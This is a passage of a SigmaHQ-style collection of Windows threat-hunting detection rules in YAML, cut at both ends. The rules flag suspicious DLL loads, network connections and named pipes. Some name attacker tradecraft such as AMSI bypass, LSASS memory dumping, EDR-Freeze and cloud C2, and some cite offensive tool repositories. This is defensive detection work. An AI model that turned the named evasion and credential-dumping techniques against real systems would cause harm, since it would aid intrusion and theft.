    "content": "title: Amsi.DLL Load By Uncommon Process\nid: facd1549-e416-48e0-b8c4-41d7215eedc8\nstatus: test\ndescription: Detects loading of Amsi.dll by uncommon processes\nreferences:\n    - https://infosecwriteups.com/amsi-bypass-new-way-2023-d506345944e9\n    - https://github.com/TheD1rkMtr/AMSI_patch\n    - https://github.com/surya-dev-singh/AmsiBypass-OpenSession\nauthor: frack113\ndate: 2023-03-12\nmodified: 2025-02-24\ntags:\n    - attack.defense-evasion\n    - attack.impact\n    - attack.t1490\n    - detection.threat-hunting\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\amsi.dll'\n    filter_main_exact:\n        Image|endswith:\n            - ':\\Windows\\explorer.exe'\n            - ':\\Windows\\Sysmon64.exe'\n    filter_main_generic:\n        Image|contains:\n            - ':\\Program Files (x86)\\'\n            - ':\\Program Files\\'\n            - ':\\Windows\\System32\\'\n            - ':\\Windows\\SysWOW64\\'\n            - ':\\Windows\\WinSxS\\'\n    filter_optional_defender:\n        Image|contains: ':\\ProgramData\\Microsoft\\Windows Defender\\Platform\\'\n        Image|endswith: '\\MsMpEng.exe'\n    filter_main_dotnet:\n        Image|contains:\n            - ':\\Windows\\Microsoft.NET\\Framework\\'\n            - ':\\Windows\\Microsoft.NET\\Framework64\\'\n            - ':\\Windows\\Microsoft.NET\\FrameworkArm\\'\n            - ':\\Windows\\Microsoft.NET\\FrameworkArm64\\'\n        Image|endswith: '\\ngentask.exe'\n    filter_main_null:\n        Image: null\n    filter_main_empty:\n        Image: ''\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate third party apps installed in \"ProgramData\" and \"AppData\" might generate some false positives. Apply additional filters accordingly\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/image_load/image_load_dll_bitsproxy_load_by_uncommon_process.yml",
    "content": "title: BITS Client BitsProxy DLL Loaded By Uncommon Process\nid: e700ff14-1bff-4d1d-9438-738dff5f0466\nstatus: experimental\ndescription: |\n    Detects an uncommon process loading the \"BitsProxy.dll\". This DLL is used when the BITS COM instance or API is used.\n    This detection can be used to hunt for uncommon processes loading this DLL in your environment, which may indicate suspicious activity.\nreferences:\n    - https://unicornofhunt.com/2025/05/22/When-Unicorns-Go-Quiet-BITS-Jobs-and-the-Art-of-Stealthy-Transfers/\nauthor: UnicornOfHunt\ndate: 2025-06-04\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1197\n    - detection.threat-hunting\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\BitsProxy.dll'\n    filter_main_system:\n        Image:\n            - 'C:\\Windows\\System32\\aitstatic.exe'\n            - 'C:\\Windows\\System32\\bitsadmin.exe'\n            - 'C:\\Windows\\System32\\desktopimgdownldr.exe'\n            - 'C:\\Windows\\System32\\DeviceEnroller.exe'\n            - 'C:\\Windows\\System32\\MDMAppInstaller.exe'\n            - 'C:\\Windows\\System32\\ofdeploy.exe'\n            - 'C:\\Windows\\System32\\RecoveryDrive.exe'\n            - 'C:\\Windows\\System32\\Speech_OneCore\\common\\SpeechModelDownload.exe'\n            # - 'C:\\Windows\\System32\\svchost.exe' # BITS Service - If you collect CommandLine info. Apply a filter for the specific BITS service.\n            - 'C:\\Windows\\SysWOW64\\bitsadmin.exe'\n            - 'C:\\Windows\\SysWOW64\\OneDriveSetup.exe'\n            - 'C:\\Windows\\SysWOW64\\Speech_OneCore\\Common\\SpeechModelDownload.exe'\n    filter_optional_chrome:\n        Image: 'C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Allowed binaries in the environment that do BITS Jobs\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/image_load/image_load_dll_dbghelp_dbgcore_susp_load.yml",
    "content": "title: Dbghelp/Dbgcore DLL Loaded By Uncommon/Suspicious Process\nid: 0e277796-5f23-4e49-a490-483131d4f6e1\nrelated:\n    - id: bdc64095-d59a-42a2-8588-71fd9c9d9abc # Unsigned Loading\n      type: similar\nstatus: test\ndescription: |\n    Detects the load of the dbghelp/dbgcore DLL by a potentially uncommon or potentially suspicious process.\n    The Dbghelp and Dbgcore DLLs export functions that allow for the dump of process memory. Tools like ProcessHacker, Task Manager and some attacker tradecraft use the MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\n    As an example, the SILENTTRINITY C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n    Keep in mind that many legitimate Windows processes and services might load the aforementioned DLLs for debugging or other related purposes. Investigate the CommandLine and the Image location of the process loading the DLL.\nreferences:\n    - https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump\n    - https://www.pinvoke.net/default.aspx/dbghelp/MiniDumpWriteDump.html\n    - https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6\nauthor: Perez Diego (@darkquassar), oscd.community, Ecco\ndate: 2019-10-27\nmodified: 2024-03-01\ntags:\n    - attack.credential-access\n    - attack.t1003.001\n    - detection.threat-hunting\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith:\n            - '\\dbghelp.dll'\n            - '\\dbgcore.dll'\n        Image|endswith:\n            - '\\bash.exe'\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\dnx.exe'\n            - '\\excel.exe'\n            - '\\monitoringhost.exe'\n            - '\\msbuild.exe'\n            - '\\mshta.exe'\n            - '\\outlook.exe'\n            - '\\powerpnt.exe'\n            - '\\regsvcs.exe'\n            - '\\rundll32.exe'\n            - '\\sc.exe'\n            - '\\scriptrunner.exe'\n            - '\\winword.exe'\n            - '\\wmic.exe'\n            - '\\wscript.exe'\n            # - '\\powershell.exe' # Note: Triggered by installing common software\n            # - '\\regsvr32.exe'  # Note: triggered by installing common software\n            # - '\\schtasks.exe'  # Note: triggered by installing software\n            # - '\\svchost.exe'  # Note: triggered by some services\n    filter_main_tiworker:\n        # Note: This filter requires \"CommandLine\" field enrichment\n        CommandLine|startswith: 'C:\\WINDOWS\\WinSxS\\'\n        CommandLine|endswith: '\\TiWorker.exe -Embedding'\n    filter_main_generic:\n        # Note: This filter requires \"CommandLine\" field enrichment\n        Image|endswith: '\\svchost.exe'\n        CommandLine|endswith:\n            - '-k LocalServiceNetworkRestricted'\n            - '-k WerSvcGroup'\n    filter_main_rundll32:\n        # Note: This filter requires \"CommandLine\" field enrichment\n        Image|endswith: '\\rundll32.exe'\n        CommandLine|contains:\n            - '/d srrstr.dll,ExecuteScheduledSPPCreation'\n            - 'aepdu.dll,AePduRunUpdate'\n            - 'shell32.dll,OpenAs_RunDL'\n            - 'Windows.Storage.ApplicationData.dll,CleanupTemporaryState'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Debugging scripts might leverage this DLL in order to dump process memory for further analysis.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/image_load/image_load_dll_system_drawing_load.yml",
    "content": "title: System Drawing DLL Load\nid: 666ecfc7-229d-42b8-821e-1a8f8cb7057c\nstatus: test\ndescription: Detects processes loading \"System.Drawing.ni.dll\". This could be an indicator of potential Screen Capture.\nreferences:\n    - https://github.com/OTRF/detection-hackathon-apt29/issues/16\n    - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/7.A.1_3B4E5808-3C71-406A-B181-17B0CE3178C9.md\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-05-02\nmodified: 2023-02-22\ntags:\n    - attack.collection\n    - attack.t1113\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: image_load\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\System.Drawing.ni.dll'\n    condition: selection\nfalsepositives:\n    - False positives are very common from system and third party applications, activity needs to be investigated. This rule is best correlated with other events to increase the level of suspiciousness\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/image_load/image_load_dll_taskschd_by_process_in_potentially_suspicious_location.yml",
    "content": "title: Task Scheduler DLL Loaded By Application Located In Potentially Suspicious Location\nid: 3b92a1d0-8d4b-4d28-a1b4-1e29d49a6a3e\nstatus: test\ndescription: |\n    Detects the loading of the \"taskschd.dll\" module from a process that is located in a potentially suspicious or uncommon directory.\n    The loading of this DLL might indicate that the application has the capability to create a scheduled task via the \"Schedule.Service\" COM object.\n    Investigation of the loading application and its behavior is required to determine if it is malicious.\nreferences:\n    - https://www.logpoint.com/en/blog/shenanigans-of-scheduled-tasks/\n    - https://x.com/Max_Mal_/status/1826179497084739829\nauthor: Swachchhanda Shrawan Poudel\ndate: 2024-09-02\ntags:\n    - attack.persistence\n    - attack.execution\n    - attack.privilege-escalation\n    - attack.t1053.005\n    - detection.threat-hunting\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection_dll:\n        - ImageLoaded|endswith: '\\taskschd.dll'\n        - OriginalFileName: 'taskschd.dll'\n    selection_paths:\n        Image|contains:\n            - ':\\Temp\\'\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\Temp\\'\n            - '\\AppData\\Local\\Temp\\'\n            - '\\Desktop\\'\n            - '\\Downloads\\'\n    condition: all of selection_*\nfalsepositives:\n    - Some installers might generate false positives, apply additional filters accordingly.\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/image_load/image_load_office_excel_xll_load.yml",
    "content": "title: Microsoft Excel Add-In Loaded\nid: c5f4b5cb-4c25-4249-ba91-aa03626e3185\nstatus: test\ndescription: Detects Microsoft Excel loading an Add-In (.xll) file\nreferences:\n    - https://www.mandiant.com/resources/blog/lnk-between-browsers\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-12\ntags:\n    - attack.execution\n    - attack.t1204.002\n    - detection.threat-hunting\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\excel.exe'\n        ImageLoaded|endswith: '.xll'\n    condition: selection\nfalsepositives:\n    - The rule only looks for \".xll\" loads, so some false positives are expected with legitimate and allowed XLLs.\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/image_load/image_load_office_word_wll_load.yml",
    "content": "title: Microsoft Word Add-In Loaded\nid: 1337afba-d17d-4d23-bd55-29b927603b30\nstatus: test\ndescription: |\n    Detects Microsoft Word loading an Add-In (.wll) file, which can be used by threat actors for initial access or persistence.\nreferences:\n    - https://labs.withsecure.com/publications/add-in-opportunities-for-office-persistence\n    - https://nored0x.github.io/red-teaming/office-persistence/#what-is-a-wll-file\nauthor: Steffen Rogge (dr0pd34d)\ndate: 2024-07-10\ntags:\n    - attack.execution\n    - attack.t1204.002\n    - detection.threat-hunting\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\winword.exe'\n        ImageLoaded|endswith: '.wll'\n    condition: selection\nfalsepositives:\n    - The rule only looks for \".wll\" loads, so some false positives are expected with legitimate and allowed WLLs.\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/image_load/image_load_win_werfaultsecure_dbgcore_dbghelp_load.yml",
    "content": "title: WerFaultSecure Loading DbgCore or DbgHelp - EDR-Freeze\nid: 8a2f4b1c-3d5e-4f7a-9b2c-1e4f6d8a9c2b\nrelated:\n    - id: 387df17d-3b04-448f-8669-9e7fd5e5fd8c\n      type: similar\n    - id: 1f0b4cac-9c81-41f4-95d0-8475ff46b3e2\n      type: similar\nstatus: experimental\ndescription: |\n    Detects the loading of dbgcore.dll or dbghelp.dll by WerFaultSecure.exe, which has been observed in EDR-Freeze attacks to suspend processes and evade detection.\n    However, this behavior has also been observed during normal software installations, so further investigation is required to confirm malicious activity.\n    When threat hunting, look for this activity in conjunction with other suspicious processes starting, network connections, or file modifications that occur shortly after the DLL load.\n    Pay special attention to timing - if other malicious activities occur during or immediately after this library loading, it may indicate EDR evasion attempts.\n    Also correlate with any EDR/AV process suspension events or gaps in security monitoring during the timeframe.\nreferences:\n    - https://github.com/TwoSevenOneT/EDR-Freeze\n    - https://blog.axelarator.net/hunting-for-edr-freeze/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-11-27\nmodified: 2026-01-09\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\n    - detection.threat-hunting\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\WerFaultSecure.exe'\n        ImageLoaded|endswith:\n            - '\\dbgcore.dll'\n            - '\\dbghelp.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\nregression_tests_path: regression_data/rules-threat-hunting/windows/image_load/image_load_win_werfaultsecure_dbgcore_dbghelp_load/info.yml\n"
  },
  {
    "path": "rules-threat-hunting/windows/image_load/image_load_wmi_module_load_by_uncommon_process.yml",
    "content": "title: WMI Module Loaded By Uncommon Process\nid: 671bb7e3-a020-4824-a00e-2ee5b55f385e\nstatus: test\ndescription: Detects WMI modules being loaded by an uncommon process\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/190811-WMIModuleLoad/notebook.html\nauthor: Roberto Rodriguez @Cyb3rWard0g\ndate: 2019-08-10\nmodified: 2025-02-24\ntags:\n    - attack.execution\n    - attack.t1047\n    - detection.threat-hunting\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith:\n            - '\\fastprox.dll'\n            - '\\wbemcomn.dll'\n            - '\\wbemprox.dll'\n            - '\\wbemsvc.dll'\n            - '\\WmiApRpl.dll'\n            - '\\wmiclnt.dll'\n            - '\\WMINet_Utils.dll'\n            - '\\wmiprov.dll'\n            - '\\wmiutils.dll'\n    filter_main_generic:\n        Image|contains:\n            - ':\\Program Files (x86)\\'\n            - ':\\Program Files\\'\n            - ':\\Windows\\explorer.exe'\n            - ':\\Windows\\Microsoft.NET\\Framework\\'\n            - ':\\Windows\\Microsoft.NET\\FrameworkArm\\'\n            - ':\\Windows\\Microsoft.NET\\FrameworkArm64\\'\n            - ':\\Windows\\Microsoft.NET\\Framework64\\'\n            - ':\\Windows\\System32\\'\n            - ':\\Windows\\SysWOW64\\'\n    filter_optional_other:\n        Image|endswith:\n            - '\\WindowsAzureGuestAgent.exe'\n            - '\\WaAppAgent.exe'\n    filter_optional_thor:\n        Image|endswith:\n            - '\\thor.exe'\n            - '\\thor64.exe'\n    filter_optional_defender:\n        Image|endswith: '\\MsMpEng.exe'\n    filter_optional_teams:\n        Image|contains:\n            - '\\Microsoft\\Teams\\current\\Teams.exe'\n            - '\\Microsoft\\Teams\\Update.exe'\n    filter_optional_sysmon:\n        Image|endswith:\n            - ':\\Windows\\Sysmon.exe'\n            - ':\\Windows\\Sysmon64.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/network_connection/net_connection_win_dfsvc_non_local_ip.yml",
    "content": "title: Dfsvc.EXE Network Connection To Non-Local IPs\nid: 3c21219b-49b5-4268-bce6-c914ed50f09c\nstatus: test\ndescription: Detects network connections to non-local IPs from \"dfsvc.exe\", the utility used to handle ClickOnce applications\nreferences:\n    - https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-12\nmodified: 2024-03-12\ntags:\n    - attack.execution\n    - attack.t1203\n    - detection.threat-hunting\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\dfsvc.exe'\n        Initiated: 'true'\n    filter_main_local_ip:\n        DestinationIp|cidr: # Ranges excluded based on https://github.com/SigmaHQ/sigma/blob/0f176092326ab9d1e19384d30224e5f29f760d82/rules/windows/network_connection/net_connection_win_dllhost_net_connections.yml\n            - '127.0.0.0/8'\n            - '10.0.0.0/8'\n            - '169.254.0.0/16'  # link-local address\n            - '172.16.0.0/12'\n            - '192.168.0.0/16'\n            - '::1/128'  # IPv6 loopback\n            - 'fe80::/10'  # IPv6 link-local addresses\n            - 'fc00::/7'  # IPv6 private addresses\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - False positives are expected from ClickOnce manifests hosted on public IPs and domains. Apply additional filters for the accepted IPs in your environment as necessary.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/network_connection/net_connection_win_dfsvc_uncommon_ports.yml",
    "content": "title: Dfsvc.EXE Initiated Network Connection Over Uncommon Port\nid: 4c5fba4a-9ef6-4f16-823d-606246054741\nstatus: test\ndescription: Detects an initiated network connection over uncommon ports from \"dfsvc.exe\", the utility used to handle ClickOnce applications.\nreferences:\n    - https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-12\nmodified: 2024-01-31\ntags:\n    - attack.execution\n    - attack.t1203\n    - detection.threat-hunting\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Image|contains: ':\\Windows\\Microsoft.NET\\'\n        Image|endswith: '\\dfsvc.exe'\n        Initiated: 'true'\n    filter_main_known_ports:\n        DestinationPort:\n            - 80\n            - 443\n    filter_optional_dns_ipv6:\n        # Based on VT. More than 140 binaries made communication over DNS\n        DestinationIsIpv6: 'true'\n        DestinationPort: 53\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-threat-hunting/windows/network_connection/net_connection_win_dllhost_non_local_ip.yml",
    "content": "title: Dllhost.EXE Initiated Network Connection To Non-Local IP Address\nid: cfed2f44-16df-4bf3-833a-79405198b277\nstatus: test\ndescription: |\n    Detects Dllhost.EXE initiating a network connection to a non-local IP address.\n    Aside from Microsoft's own IP ranges, which need to be excluded, network communication from Dllhost will depend entirely on the hosted DLL.\n    An initial baseline is recommended before deployment.\nreferences:\n    - https://redcanary.com/blog/child-processes/\n    - https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08\nauthor: bartblaze\ndate: 2020-07-13\nmodified: 2024-07-16\ntags:\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.execution\n    - attack.t1559.001\n    - detection.threat-hunting\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\dllhost.exe'\n        Initiated: 'true'\n    filter_main_local_ranges:\n        DestinationIp|cidr:\n            - '::1/128'  # IPv6 loopback\n            - '10.0.0.0/8'\n            - '127.0.0.0/8'\n            - '172.16.0.0/12'\n            - '192.168.0.0/16'\n            - '169.254.0.0/16'\n            - 'fc00::/7'  # IPv6 private addresses\n            - 'fe80::/10'  # IPv6 link-local addresses\n    filter_main_msrange:\n        DestinationIp|cidr:\n            - '20.184.0.0/13' # Microsoft Corporation\n            - '20.192.0.0/10' # Microsoft Corporation\n            - '23.72.0.0/13'  # Akamai International B.V.\n            - '51.10.0.0/15'  # Microsoft Corporation\n            - '51.103.0.0/16' # Microsoft Corporation\n            - '51.104.0.0/15' # Microsoft Corporation\n            - '52.224.0.0/11'  # Microsoft Corporation\n            - '150.171.0.0/19'  # Microsoft Corporation\n            - '204.79.197.0/24' # Microsoft Corporation\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Communication to other corporate systems that use IP addresses from public address spaces\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/network_connection/net_connection_win_hh_http_connection.yml",
    "content": "title: HH.EXE Initiated HTTP Network Connection\nid: 468a8cea-2920-4909-a593-0cbe1d96674a\nrelated:\n    - id: f57c58b3-ee69-4ef5-9041-455bf39aaa89\n      type: derived\nstatus: test\ndescription: |\n    Detects a network connection initiated by the \"hh.exe\" process to HTTP destination ports, which could indicate the execution/download of remotely hosted .chm files.\nreferences:\n    - https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html\n    - https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-05\ntags:\n    - attack.defense-evasion\n    - attack.t1218.001\n    - detection.threat-hunting\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\hh.exe'\n        Initiated: 'true'\n        DestinationPort:\n            - 80\n            - 443\n    condition: selection\nfalsepositives:\n    - False positive is expected from launching \"hh.exe\" for the first time on a machine in a while or simply from help files containing reference to external sources. Best correlate this with process creation and file events.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/network_connection/net_connection_win_msiexec_http.yml",
    "content": "title: Msiexec.EXE Initiated Network Connection Over HTTP\nid: 8e5e38e4-5350-4c0b-895a-e872ce0dd54f\nstatus: test\ndescription: |\n    Detects a network connection initiated by an \"Msiexec.exe\" process over port 80 or 443.\n    Adversaries might abuse \"msiexec.exe\" to install and execute remotely hosted packages.\n    Use this rule to hunt for potentially anomalous or suspicious communications.\nreferences:\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md\nauthor: frack113\ndate: 2022-01-16\nmodified: 2024-07-16\ntags:\n    - attack.defense-evasion\n    - attack.t1218.007\n    - detection.threat-hunting\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Initiated: 'true'\n        Image|endswith: '\\msiexec.exe'\n        DestinationPort:\n            - 80\n            - 443\n    condition: selection\nfalsepositives:\n    - Likely\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/network_connection/net_connection_win_powershell_network_connection.yml",
    "content": "title: Network Connection Initiated By PowerShell Process\nid: 1f21ec3f-810d-4b0e-8045-322202e22b4b\nstatus: test\ndescription: |\n    Detects a network connection that was initiated from a PowerShell process.\n    Often times malicious powershell scripts download additional payloads or communicate back to command and control channels via uncommon ports or IPs.\n    Use this rule as a basis for hunting for anomalies.\nreferences:\n    - https://www.youtube.com/watch?v=DLtJTxMWZ2o\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-03-13\nmodified: 2024-03-13\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - detection.threat-hunting\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        Initiated: 'true'\n    filter_main_local_ip:\n        DestinationIp|cidr:\n            - '127.0.0.0/8'\n            - '10.0.0.0/8'\n            - '169.254.0.0/16'  # link-local address\n            - '172.16.0.0/12'\n            - '192.168.0.0/16'\n            - '::1/128'  # IPv6 loopback\n            - 'fe80::/10'  # IPv6 link-local addresses\n            - 'fc00::/7'  # IPv6 private addresses\n        User|contains: # covers many language settings\n            - 'AUTHORI'\n            - 'AUTORI'\n    filter_main_msrange:\n        DestinationIp|cidr:\n            - '20.184.0.0/13'\n            - '51.103.210.0/23'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Administrative scripts\n    - Microsoft IP range\n    - Additional filters are required. Adjust to your environment (e.g. extend filters with company's ip range')\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/network_connection/net_connection_win_susp_azurefd_connection.yml",
    "content": "title: Potentially Suspicious Azure Front Door Connection\nid: 8cb4d14e-776e-43c2-8fb9-91e7fcea32b4\nstatus: test\ndescription: |\n    Detects connections with Azure Front Door (known legitimate service that can be leveraged for C2)\n    that fall outside of known benign behavioral baseline (not using common apps or common azurefd.net endpoints)\nreferences:\n    - https://lots-project.com/site/2a2e617a75726566642e6e6574\n    - https://medium.com/r3d-buck3t/red-teaming-in-cloud-leverage-azure-frontdoor-cdn-for-c2-redirectors-79dd9ca98178\n    - https://www.fortalicesolutions.com/posts/hiding-behind-the-front-door-with-azure-domain-fronting\nauthor: Isaac Dunham\ndate: 2024-11-07\ntags:\n    - attack.command-and-control\n    - attack.t1102.002\n    - attack.t1090.004\n    - detection.threat-hunting\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        DestinationHostname|contains: 'azurefd.net'\n    filter_main_web_browsers:\n        Image|endswith:\n            - 'brave.exe'\n            - 'chrome.exe'\n            - 'chromium.exe'\n            - 'firefox.exe'\n            - 'msedge.exe'\n            - 'msedgewebview2.exe'\n            - 'opera.exe'\n            - 'vivaldi.exe'\n    filter_main_common_talkers:\n        Image|endswith: 'searchapp.exe' # Windows search service uses a significant amount of Azure FD\n    filter_main_known_benign_domains:\n        DestinationHostname|contains:\n            - 'afdxtest.z01.azurefd.net' # used by Cortana; Cisco Umbrella top 1m\n            - 'fp-afd.azurefd.net' # used by Cortana; Cisco Umbrella top 1m\n            - 'fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net' # used by Cortana; Cisco Umbrella top 1m\n            - 'roxy.azurefd.net' # used by Cortana; Cisco Umbrella top 1m\n            - 'powershellinfraartifacts-gkhedzdeaghdezhr.z01.azurefd.net' # Used by VS Code; Cisco Umbrella top 1m\n            - 'storage-explorer-publishing-feapcgfgbzc2cjek.b01.azurefd.net' # Used by Azure Storage Explorer; Cisco Umbrella top 1m\n            - 'graph.azurefd.net' # MS Graph; Cisco Umbrella top 1m\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Results are not inherently suspicious, but should be investigated during threat hunting for potential cloud C2.\n    - Organization-specific Azure Front Door endpoints\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/network_connection/net_connection_win_susp_initaited_public_folder.yml",
    "content": "title: Network Connection Initiated From Users\\Public Folder\nid: bcb03938-9f8b-487d-8d86-e480691e1d71\nrelated:\n    - id: 7b434893-c57d-4f41-908d-6a17bf1ae98f\n      type: derived\nstatus: test\ndescription: |\n    Detects a network connection initiated from a process located in the \"C:\\Users\\Public\" folder.\n    Attackers are known to drop their malicious payloads and malware in this directory as it is writable by everyone.\n    Use this rule to hunt for potentially suspicious or uncommon activity in your environment.\nreferences:\n    - https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo\nauthor: Florian Roth (Nextron Systems)\ndate: 2024-05-31\ntags:\n    - attack.command-and-control\n    - attack.t1105\n    - detection.threat-hunting\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Initiated: 'true'\n        Image|contains: ':\\Users\\Public\\'\n    filter_optional_ibm:\n        Image|contains: ':\\Users\\Public\\IBM\\ClientSolutions\\Start_Programs\\' # IBM Client Solutions Default Location (Added by Tim Shelton - https://github.com/SigmaHQ/sigma/pull/3053/files)\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Likely from legitimate third party applications that execute from the \"Public\" directory.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/pipe_created/pipe_created_sysinternals_psexec_default_pipe.yml",
    "content": "title: PsExec Default Named Pipe\nid: f3f3a972-f982-40ad-b63c-bca6afdfad7c\nrelated:\n    - id: 42c575ea-e41e-41f1-b248-8093c3e82a28\n      type: derived\nstatus: test\ndescription: Detects PsExec service default pipe creation\nreferences:\n    - https://www.jpcert.or.jp/english/pub/sr/ir_research.html\n    - https://jpcertcc.github.io/ToolAnalysisResultSheet\nauthor: Thomas Patzke\ndate: 2017-06-12\nmodified: 2022-10-09\ntags:\n    - attack.execution\n    - attack.t1569.002\n    - attack.s0029\n    - detection.threat-hunting\nlogsource:\n    category: pipe_created\n    product: windows\n    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'\ndetection:\n    selection:\n        PipeName: '\\PSEXESVC'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/powershell/powershell_classic/posh_pc_alternate_powershell_hosts.yml",
    "content": "title: Uncommon PowerShell Hosts\nid: d7326048-328b-4d5e-98af-86e84b17c765\nrelated:\n    - id: 64e8e417-c19a-475a-8d19-98ea705394cc\n      type: derived\nstatus: test\ndescription: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/190815-RemoteServiceInstallation/notebook.html\nauthor: Roberto Rodriguez @Cyb3rWard0g\ndate: 2019-08-11\nmodified: 2025-10-22\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: ps_classic_start\ndetection:\n    selection:\n        Data|contains: 'HostApplication='\n    # Note: PowerShell logging data is localized, meaning that the \"HostApplication\" field will be translated to a different field on a non-English layout. This rule doesn't take this into account due to the sheer amount of possibilities. It's up to the user to add these cases.\n    filter_main_ps:\n        Data|contains:\n            - 'HostApplication=?:/Windows/System32/WindowsPowerShell/v1.0/powershell' # In some cases powershell was invoked with inverted slashes\n            - 'HostApplication=?:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell' # In some cases powershell was invoked with inverted slashes\n            - 'HostApplication=?:\\Windows\\System32\\sdiagnhost.exe'\n            - 'HostApplication=?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell'\n            - 